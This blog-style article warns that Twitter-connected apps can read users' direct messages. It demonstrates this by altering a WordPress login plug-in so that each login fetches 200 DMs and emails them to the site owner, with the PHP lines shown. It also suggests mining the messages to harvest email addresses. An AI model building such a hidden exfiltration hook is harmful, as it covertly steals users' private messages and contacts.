Twitter Exploit Warning: How Anyone Can Easily Snatch Your Direct Messages

Worries about application access have been floating in the Twitter streams of late. Many have voiced concerns about privacy breaches by applications that log users in to Twitter or access their account.

Turns out, those fears are well founded. The Twitter API can be exploited quite easily and let anyone gain access to your Direct Messages.

Using WordPress to Access Direct Messages

For the sake of simplicity, I’m using WordPress to demonstrate accessing Direct Message information.

The Twitter API allows developers access to lots of neat information. You can send messages, update statuses, and do whatever you so please. Sure, there are some permission settings available for developers (read vs. read/write), but few users read this stuff anyway.

Before we go further, apologies to Shannon Whitley for butchering your WordPress plug-in (Twit Connect) and making an example of it. Whitley has developed a simple plug-in for WordPress that bridges authentication between your blog and Twitter, allowing Twitter users to sign in using their existing credentials. This is similar to the comment structure on Search Engine Watch, which I’m sure many of you have used already.

Once you install the plug-in, 90 percent of the work is done. The first thing you’ll need to do is register your application with Twitter, which can be done here. You’ll be asked for some basic information and you’ll then be giving credentials which you will need to fill out in the Twit Connect settings panel.

Connection Type

Retrieving Messages

The next step is to look into the Twitter API for Direct Message access. This can be found here.

From this we can see a number of options here, we have a number of output return options and options for limiting the number of messages retrieved. To make it simple, we’ll grab the latest 200 messages from a Twitter user’s inbox.

So now we need to find a little place to butcher the plug-in code and tap into the dirty private messages.

Plug-in Code

Here looks about as good as any spot. Most of the work has been done, so we’ll just hook into the TwitterOAuth PHP library here, shoot through the request for direct messages, and play.

Pretty complicated so far, right? No, not really. Drop in the call to the direct_messages function and we’re just about done.

Before the call to twc_Login:

$xml = $to->get(‘direct_messages’, array(‘count’ => 200));

This simply retrieves the latest 200 direct messages and stores them in a variable — not much use right now, but let’s say you wanted a dump of everyone’s private inbox every time they logged in to your WordPress site. Well, you can simply e-mail the data back to yourself.

e.g.: mail(‘’, ‘Direct Message Dump for ‘.$screen_name, print_r($xml,true));

Mail Dump

Done! Now every time someone logs into your WordPress website to post a comment, using their Twitter account for authentication, 200 personal messages hidden inside their Twitter inbox are getting e-mailed to you.

So What Good is This?

Personally, I don’t care to read direct messages. However, I can see it being useful for list harvesting.

You could take this and extend the idea further, by scouring page by page their inbox and reading each message, looking for e-mail addresses. This is quite simple to do.

This is probably the most useful strategy for this information, as most people want to take conversations to e-mail or chat after two or three tweets. So e-mail list harvesting should be plentiful.

The next step: just get your “application” heavily utilized. Or force integration into your heavy traffic WordPress blog.

Kristine Schachinger also looks at what can be done with this type of information and some of the possible abuses of this data in her article, “Twitter: Take Better Care of Our Private Information!

What Can You Do?

Simple solution: don’t let applications you don’t completely trust log you in. Average users really don’t know what they’re doing and it’s really easy to automatically hit the big “accept” buttons online or during a software installation. But in this case it could be the equivalent of hitting “install” on a spyware application.

To be fair, even the geeks do it. How many of you actually read the terms and conditions to the last application you installed, or website you signed up to?

Bottom line: Be aware of what you’re granting access to, whether it’s on Twitter, Facebook, or any other site. Be smart about what sites you give access to, or else your private data will no longer be private.

Related reading

Top 19 Instagram marketing tools to use for success
Eight tips to get the most from your Facebook page in 2019
social media_does it affect seo